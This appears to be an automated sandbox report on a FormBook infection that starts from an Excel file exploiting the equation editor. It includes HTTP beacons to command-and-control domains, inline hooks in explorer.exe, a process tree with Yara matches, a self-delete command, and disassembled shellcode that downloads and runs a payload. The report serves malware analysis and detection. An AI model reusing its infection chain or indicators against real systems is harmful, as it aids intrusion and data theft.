                                Data Ascii: to more of what you would expect to find here, luxpsy.com has it all. We hope you find what you are searchiAECng for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><
                                Nov 14, 2023 13:28:02.687256098 CET409INData Raw: 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67
                                Data Ascii: tgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-
                                Nov 14, 2023 13:28:02.687268972 CET410INData Raw: 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23
                                Data Ascii: t-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__c
                                Nov 14, 2023 13:28:02.687280893 CET412INData Raw: 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74
                                Data Ascii: ntainer-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color
                                Nov 14, 2023 13:28:02.687293053 CET413INData Raw: 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a
                                Data Ascii: ansition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-m
                                Nov 14, 2023 13:28:02.687308073 CET414INData Raw: 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63
                                Data Ascii: #fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;wid
                                Nov 14, 2023 13:28:02.687319994 CET415INData Raw: 43 41 41 0d 0a 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2b 2e 73 77
                                Data Ascii: CAAus:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translat
                                Nov 14, 2023 13:28:02.687330961 CET416INData Raw: 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2d 63 75 72 76 65 64 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72
                                Data Ascii: ackground:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-ind
                                Nov 14, 2023 13:28:02.687644005 CET418INData Raw: 30 3b 6d 61 72 67 69 6e 3a 2e 31 31 65 6d 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b
                                Data Ascii: 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:u
                                Nov 14, 2023 13:28:02.993742943 CET419INData Raw: 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 6e 63 2d 63 6f 6e 74 61 69 6e 65 72 20 73 70 61 6e 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 65 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a
                                Data Ascii: gn:center;margin-top:10px}.nc-container span{font-family:Ariel,sans-serif;font-size:16px;color:#888} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"luxpsy.com","domainName":"luxpsy.com","


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.224916738.11.36.6880C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 14, 2023 13:28:23.777817965 CET431OUTGET /ge06/?6l58L2=0+Pk4QqMeOZthSuOlE3hLercqAjKj7AZkI6NQZ8fzlVSI648NH9aZsaxoIAU5h7921vkYw==&BL3=KP-PB41 HTTP/1.1
                                Host: www.sxchenggu.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                4192.168.2.22491683.33.130.19080C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 14, 2023 13:28:45.165462017 CET431OUTGET /ge06/?6l58L2=STnFDs3dPiWe372IPmsYuoiBxbI3LvhJSNAXi8QejK8uEGpyoTWx2uWpsN+kECUfI/d5Qw==&BL3=KP-PB41 HTTP/1.1
                                Host: www.centralngs.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 14, 2023 13:28:45.382431030 CET432INHTTP/1.1 403 Forbidden
                                Server: openresty
                                Date: Tue, 14 Nov 2023 12:28:45 GMT
                                Content-Type: text/html
                                Content-Length: 150
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                5192.168.2.224916934.149.87.4580C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 14, 2023 13:29:05.883658886 CET433OUTGET /ge06/?6l58L2=0AfOVuqZSJfRN5GiS/+VmpnTwyRml/2OLwKSVYenXKtwNMi61Jg0OdgGHf2AFfl8gIxxQw==&BL3=KP-PB41 HTTP/1.1
                                Host: www.west-paws.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 14, 2023 13:29:06.066524982 CET433INHTTP/1.1 429 Too Many Requests
                                Content-Length: 0
                                Accept-Ranges: bytes
                                Date: Tue, 14 Nov 2023 12:29:05 GMT
                                X-Served-By: cache-bfi-krnt7300100-BFI
                                X-Cache: MISS
                                X-Seen-By: yvSunuo/8ld62ehjr5B7kA==
                                Via: 1.1 google
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                6192.168.2.2249170206.188.193.21180C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 14, 2023 13:29:47.675930977 CET434OUTGET /ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41 HTTP/1.1
                                Host: www.miamirealestatecommercial.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 14, 2023 13:29:50.687489986 CET434OUTGET /ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41 HTTP/1.1
                                Host: www.miamirealestatecommercial.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Code Manipulations

                                User Modules

                                Hook Summary

                                Function NameHook TypeActive in Processes
                                PeekMessageAINLINEexplorer.exe
                                PeekMessageWINLINEexplorer.exe
                                GetMessageWINLINEexplorer.exe
                                GetMessageAINLINEexplorer.exe

                                Processes

                                Process: explorer.exe, Module: USER32.dll
                                Function NameHook TypeNew Data
                                PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE8
                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE8
                                GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE8
                                GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE8

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:13:26:01
                                Start date:14/11/2023
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                Imagebase:0x13f500000
                                File size:28'253'536 bytes
                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:2
                                Start time:13:26:20
                                Start date:14/11/2023
                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                Imagebase:0x400000
                                File size:543'304 bytes
                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:13:26:25
                                Start date:14/11/2023
                                Path:C:\Users\user\AppData\Roaming\word.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\word.exe
                                Imagebase:0x400000
                                File size:400'516 bytes
                                MD5 hash:AFFC03992E31B5D4324B41CBD40D911E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:6
                                Start time:13:26:25
                                Start date:14/11/2023
                                Path:C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
                                Imagebase:0x400000
                                File size:265'216 bytes
                                MD5 hash:CF92A3EC74E407574A58BCF121BEC4F1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:7
                                Start time:13:26:26
                                Start date:14/11/2023
                                Path:C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe
                                Imagebase:0x400000
                                File size:265'216 bytes
                                MD5 hash:CF92A3EC74E407574A58BCF121BEC4F1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:8
                                Start time:13:26:27
                                Start date:14/11/2023
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0xff2f0000
                                File size:3'229'696 bytes
                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:9
                                Start time:13:26:27
                                Start date:14/11/2023
                                Path:C:\Windows\SysWOW64\autochk.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\SysWOW64\autochk.exe
                                Imagebase:0x840000
                                File size:668'160 bytes
                                MD5 hash:F88A52EB62019D6A62FDD9E08034DBD8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:10
                                Start time:13:26:27
                                Start date:14/11/2023
                                Path:C:\Windows\SysWOW64\chkdsk.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                Imagebase:0x5e0000
                                File size:16'384 bytes
                                MD5 hash:A01E18A156825557A24A643A2547AA8C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:11
                                Start time:13:26:31
                                Start date:14/11/2023
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
                                Imagebase:0x4a330000
                                File size:302'592 bytes
                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:53.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:87.5%
                                  Total number of Nodes:32
                                  Total number of Limit Nodes:2
                                  execution_graph 137 36bb92b LoadLibraryW 150 36bb953 137->150 139 36bb940 140 36bb947 139->140 142 36bb9b5 URLDownloadToFileW 139->142 164 36bba50 URLDownloadToFileW 140->164 160 36bba6d 142->160 144 36bb964 144->142 151 36bb956 150->151 152 36bba50 6 API calls 151->152 153 36bb964 URLDownloadToFileW 151->153 152->153 155 36bba6d 5 API calls 153->155 156 36bba59 155->156 157 36bbad0 156->157 170 36bba9b 156->170 157->139 159 36bba93 161 36bba70 160->161 162 36bba9b 5 API calls 161->162 163 36bba93 162->163 165 36bba59 164->165 166 36bba6d 5 API calls 164->166 167 36bbad0 165->167 168 36bba9b 5 API calls 165->168 166->165 167->144 169 36bba93 168->169 171 36bba9e WinExec 170->171 177 36bbabb 171->177 173 36bbaaf 174 36bbaf6 173->174 175 36bbabe ExitProcess GetPEB 173->175 174->159 176 36bbad0 175->176 176->159 178 36bbabe ExitProcess GetPEB 177->178 179 36bbad0 178->179 179->173

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_036BBABB 5 Function_036BBAEA 0->5 1 Function_036BBA9B 1->0 1->5 2 Function_036BB92B 2->1 2->5 6 Function_036BBA6D 2->6 7 Function_036BB953 2->7 8 Function_036BBA50 2->8 3 Function_036AC0EA 4 Function_036BBB3B 6->1 7->1 7->5 7->6 7->8 8->1 8->5 8->6 9 Function_036AC0D5

                                  Executed Functions

                                  Function 036BB92B Relevance: 3.1, APIs: 2, Instructions: 145libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • LoadLibraryW.KERNEL32 ref: 036BB939
                                    • Part of subcall function 036BB953: URLDownloadToFileW.URLMON(00000000,036BB964,?,00000000,00000000), ref: 036BBA52
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.412621027.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3640000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadFileLibraryLoad
                                  • String ID:
                                  • API String ID: 2776762486-0
                                  • Opcode ID: 443befbf59797b223845273d0ae4ec6a704aaeb0a51e3196c3d5397d435c913e
                                  • Instruction ID: edb149d864f430d272956df2a21e35b765f832a398ae652c1318ede1fc24a506
                                  • Opcode Fuzzy Hash: 443befbf59797b223845273d0ae4ec6a704aaeb0a51e3196c3d5397d435c913e
                                  • Instruction Fuzzy Hash: 8551F2A284C7C56FCB27D7304D7AA91BF706A63104B0DCACED8D60B4A3E399A145CB56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 036BBA9B Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 29 36bba9b-36bbab0 WinExec call 36bbabb 33 36bbb1b-36bbb1f 29->33 34 36bbab2 29->34 35 36bbb23 33->35 36 36bbb21 33->36 37 36bbb04 34->37 38 36bbab4 34->38 41 36bbb29-36bbb32 35->41 42 36bbb25-36bbb27 35->42 36->42 39 36bbb0c-36bbb10 37->39 40 36bbb06-36bbb0a 37->40 38->42 43 36bbab6-36bbacd ExitProcess GetPEB 38->43 39->42 45 36bbb12-36bbb16 39->45 40->39 44 36bbb18 40->44 49 36bbafb-36bbafe 41->49 50 36bbb34 41->50 46 36bbb37-36bbb38 42->46 53 36bbad0-36bbae1 call 36bbaea 43->53 44->33 45->42 45->44 49->41 52 36bbb00 49->52 50->46 52->37 57 36bbae3-36bbae7 53->57
                                  APIs
                                  • WinExec.KERNEL32(?,00000001,?,036BBA93,?,036BBA59), ref: 036BBAA8
                                    • Part of subcall function 036BBABB: ExitProcess.KERNELBASE(00000000,?,036BBAAF,?,036BBA93,?,036BBA59), ref: 036BBAC0
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.412621027.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3640000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExecExitProcess
                                  • String ID:
                                  • API String ID: 4112423671-0
                                  • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                  • Instruction ID: b448b56ce790a4e4748b08e4fbec74fa40a1b613fa94537d9d2726f66039ad7c
                                  • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                  • Instruction Fuzzy Hash: F6F0FF59D0825261CB34E2288A55BFBAFB0EB41300FCC8857D8910718DDDA880C38F29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 036BB953 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 58 36bb953-36bb95e 60 36bb964-36bba64 URLDownloadToFileW call 36bba6d 58->60 61 36bb95f call 36bba50 58->61 73 36bbad2-36bbada call 36bbaea 60->73 74 36bba66 60->74 61->60 79 36bbadf-36bbae1 73->79 75 36bba68-36bba69 74->75 76 36bbad1 74->76 78 36bba6b-36bba94 call 36bba9b 75->78 75->79 76->73 80 36bbae3-36bbae7 79->80 81 36bbad0 79->81 81->73
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.412621027.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3640000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadFile
                                  • String ID:
                                  • API String ID: 1407266417-0
                                  • Opcode ID: ec886444d13e5bee6bad49637901dafcc41ef756d67cfc4fd1d71d1daf5685e5
                                  • Instruction ID: b6aede87fe319bcff610a191534072914997ccc6a974501fa08d140c978b072a
                                  • Opcode Fuzzy Hash: ec886444d13e5bee6bad49637901dafcc41ef756d67cfc4fd1d71d1daf5685e5
                                  • Instruction Fuzzy Hash: 6441FEA294C7D15FCB23D7304C6AA91BF706E63104B0DCACED4DA0A8A3E3A99141C752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 036BBA50 Relevance: 1.6, APIs: 1, Instructions: 58filenetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 85 36bba50-36bba52 URLDownloadToFileW 86 36bba59-36bba64 85->86 87 36bba54 call 36bba6d 85->87 88 36bbad2-36bbada call 36bbaea 86->88 89 36bba66 86->89 87->86 94 36bbadf-36bbae1 88->94 90 36bba68-36bba69 89->90 91 36bbad1 89->91 93 36bba6b-36bba94 call 36bba9b 90->93 90->94 91->88 95 36bbae3-36bbae7 94->95 96 36bbad0 94->96 96->88
                                  APIs
                                  • URLDownloadToFileW.URLMON(00000000,036BB964,?,00000000,00000000), ref: 036BBA52
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.412621027.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
